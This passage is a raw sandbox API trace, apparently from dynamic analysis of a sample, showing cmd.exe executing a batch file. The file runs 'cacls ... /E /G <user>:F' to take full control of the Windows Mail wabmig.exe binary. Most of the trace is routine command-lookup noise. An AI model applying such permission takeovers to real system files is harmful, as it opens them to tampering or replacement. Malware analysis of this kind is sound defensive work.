(_String1="\"C", _String2="MKLINK") returned -75 [0292.302] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0292.302] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0292.302] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0292.302] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0292.302] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0292.302] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0292.302] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0292.302] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0292.302] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0292.302] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0292.302] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0292.302] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0292.302] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0292.302] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0292.302] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0292.302] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0292.302] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0292.302] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0292.303] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0292.303] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0292.303] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0292.303] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0292.303] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0292.303] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0292.303] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0292.303] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0292.303] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0292.303] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0292.303] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0292.303] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0292.303] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0292.303] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0292.303] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0292.303] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0292.303] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0292.303] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0292.303] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0292.303] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0292.303] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0292.303] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0292.303] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0292.303] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0292.303] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0292.303] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0292.303] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0292.304] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0292.304] SetErrorMode (uMode=0x0) returned 0x0 [0292.304] SetErrorMode (uMode=0x1) returned 0x0 [0292.304] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0xb005d0, lpFilePart=0x85f464 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x85f464*="Desktop") returned 0x1d [0292.304] SetErrorMode (uMode=0x0) returned 0x1 [0292.304] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0292.304] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0292.307] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.307] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0x85f210, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f210) returned 0xb0b2e0 [0292.307] FindClose (in: hFindFile=0xb0b2e0 | out: hFindFile=0xb0b2e0) returned 1 [0292.307] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0292.307] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0292.307] GetConsoleTitleW (in: lpConsoleTitle=0x85f6e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0292.308] ApiSetQueryApiSetPresence () returned 0x0 [0292.308] ResolveDelayLoadedAPI () returned 0x745414a0 [0292.310] SaferWorker () returned 0x0 [0292.322] SetErrorMode (uMode=0x0) returned 0x0 [0292.322] SetErrorMode (uMode=0x1) returned 0x0 [0292.322] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0xb0aed8, lpFilePart=0x85f594 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x85f594*="vRnqNMBW.bat") returned 0x2a [0292.322] SetErrorMode (uMode=0x0) returned 0x1 [0292.322] wcsspn (_String=" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", _Control=" \x09") returned 0x1 [0292.323] CmdBatNotificationStub () returned 0x1 [0292.323] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x85f624, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0292.323] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0292.323] _get_osfhandle (_FileHandle=3) returned 0xb4 [0292.323] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0292.323] _get_osfhandle (_FileHandle=3) returned 0xb4 [0292.323] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0292.323] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x85f5f4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x85f5f4*=0xe2, lpOverlapped=0x0) returned 1 [0292.323] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0292.323] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0292.324] _get_osfhandle (_FileHandle=3) returned 0xb4 [0292.324] GetFileType (hFile=0xb4) returned 0x1 [0292.324] _get_osfhandle (_FileHandle=3) returned 0xb4 [0292.324] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0292.325] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0292.325] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0292.325] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0292.325] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0292.325] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0292.325] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0292.325] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0292.325] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0292.327] _tell (_FileHandle=3) returned 32 [0292.327] _close (_FileHandle=3) returned 0 [0292.327] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x85f3b8 | out: _Buffer="\r\n") returned 2 [0292.327] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.327] GetFileType (hFile=0x3c) returned 0x2 [0292.327] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.327] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f390 | out: lpMode=0x85f390) returned 1 [0292.328] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.328] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x85f3a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f3a8*=0x2) returned 1 [0292.328] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0292.328] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0292.328] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x85f3b4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0292.328] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x85f3b4 | out: _Buffer=">") returned 1 [0292.328] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.328] GetFileType (hFile=0x3c) returned 0x2 [0292.329] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.329] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f394 | out: lpMode=0x85f394) returned 1 [0292.329] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.329] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x85f3ac, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x85f3ac*=0x1e) returned 1 [0292.329] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.329] GetFileType (hFile=0x3c) returned 0x2 [0292.329] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.329] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f634 | out: lpMode=0x85f634) returned 1 [0292.329] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.329] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xb07930*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x85f64c, lpReserved=0x0 | out: lpBuffer=0xb07930*, lpNumberOfCharsWritten=0x85f64c*=0x5) returned 1 [0292.330] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x85f654 | out: _Buffer=" \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G CIiHmnxMn6Ps:F /C ") returned 68 [0292.330] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.330] GetFileType (hFile=0x3c) returned 0x2 [0292.330] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.330] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f62c | out: lpMode=0x85f62c) returned 1 [0292.330] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.330] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0x85f644, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f644*=0x44) returned 1 [0292.330] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x85f668 | out: _Buffer="\r\n") returned 2 [0292.330] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.330] GetFileType (hFile=0x3c) returned 0x2 [0292.330] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.330] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f640 | out: lpMode=0x85f640) returned 1 [0292.330] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.330] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x85f658, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f658*=0x2) returned 1 [0292.330] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0292.330] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0292.330] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0292.330] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0292.330] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0292.330] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0292.330] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0292.330] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0292.330] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0292.330] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0292.330] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0292.331] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0292.331] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0292.331] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0292.331] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0292.331] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0292.331] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0292.331] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0292.331] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0292.331] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0292.331] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0292.331] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0292.331] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0292.331] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0292.331] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0292.331] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0292.331] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0292.331] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0292.331] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0292.331] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0292.331] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0292.331] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0292.331] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0292.331] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0292.331] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0292.331] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0292.331] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0292.331] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0292.331] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0292.331] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0292.331] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0292.331] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0292.331] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0292.331] SetErrorMode (uMode=0x0) returned 0x0 [0292.331] SetErrorMode (uMode=0x1) returned 0x0 [0292.331] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb0c068, lpFilePart=0x85f404 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x85f404*="Desktop") returned 0x1d [0292.331] SetErrorMode (uMode=0x0) returned 0x1 [0292.332] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0292.332] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0292.333] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0292.333] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.333] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xffffffff [0292.333] GetLastError () returned 0x2 [0292.333] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.333] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xffffffff [0292.334] GetLastError () returned 0x2 [0292.334] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.334] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xb0c400 [0292.334] FindClose (in: hFindFile=0xb0c400 | out: hFindFile=0xb0c400) returned 1 [0292.334] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xffffffff [0292.334] GetLastError () returned 0x2 [0292.334] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xb0c400 [0292.334] FindClose (in: hFindFile=0xb0c400 | out: hFindFile=0xb0c400) returned 1 [0292.334] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0292.334] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0292.334] GetConsoleTitleW (in: lpConsoleTitle=0x85f1d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0292.841] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0292.841] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0292.841] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0292.841] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0292.842] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0292.842] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0292.842] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0292.842] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0292.842] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0292.842] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0292.842] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0292.842] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0292.842] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0292.842] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0292.842] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0292.842] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0292.842] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0292.842] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0292.842] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0292.842] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0292.842] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0292.842] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0292.842] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0292.842] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0292.842] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0292.842] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0292.842] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0292.842] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0292.842] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0292.842] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0292.842] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0292.842] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0292.842] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0292.842] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0292.842] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0292.842] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0292.842] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0292.842] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0292.842] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0292.842] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0292.842] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0292.842] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0292.842] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0292.842] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0292.842] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0292.842] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0292.842] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0292.842] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0292.842] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0292.842] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0292.842] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0292.842] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0292.842] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0292.843] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0292.843] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0292.843] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0292.843] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0292.843] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0292.843] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0292.843] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0292.843] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0292.843] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0292.843] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0292.843] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0292.843] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0292.843] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0292.843] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0292.843] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0292.843] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0292.843] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0292.843] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0292.843] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0292.843] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0292.843] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0292.843] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0292.843] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0292.843] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0292.843] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0292.843] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0292.843] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0292.843] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0292.843] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0292.843] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0292.843] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0292.843] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0292.843] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0292.843] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0292.843] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0292.843] SetErrorMode (uMode=0x0) returned 0x0 [0292.843] SetErrorMode (uMode=0x1) returned 0x0 [0292.843] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb0c6c8, lpFilePart=0x85ece4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x85ece4*="Desktop") returned 0x1d [0292.843] SetErrorMode (uMode=0x0) returned 0x1 [0292.844] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0292.844] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0292.844] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0292.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.844] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xffffffff [0292.844] GetLastError () returned 0x2 [0292.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.844] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xffffffff [0292.844] GetLastError () returned 0x2 [0292.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xb0ca60 [0292.845] FindClose (in: hFindFile=0xb0ca60 | out: hFindFile=0xb0ca60) returned 1 [0292.845] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xffffffff [0292.845] GetLastError () returned 0x2 [0292.845] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xb0ca60 [0292.845] FindClose (in: hFindFile=0xb0ca60 | out: hFindFile=0xb0ca60) returned 1 [0292.845] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0292.845] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0292.845] GetConsoleTitleW (in: lpConsoleTitle=0x85ef64, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0292.971] InitializeProcThreadAttributeList (in: lpAttributeList=0x85ee90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x85ee74 | out: lpAttributeList=0x85ee90, lpSize=0x85ee74) returned 1 [0292.971] UpdateProcThreadAttribute (in: lpAttributeList=0x85ee90, dwFlags=0x0, Attribute=0x60001, lpValue=0x85ee7c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: 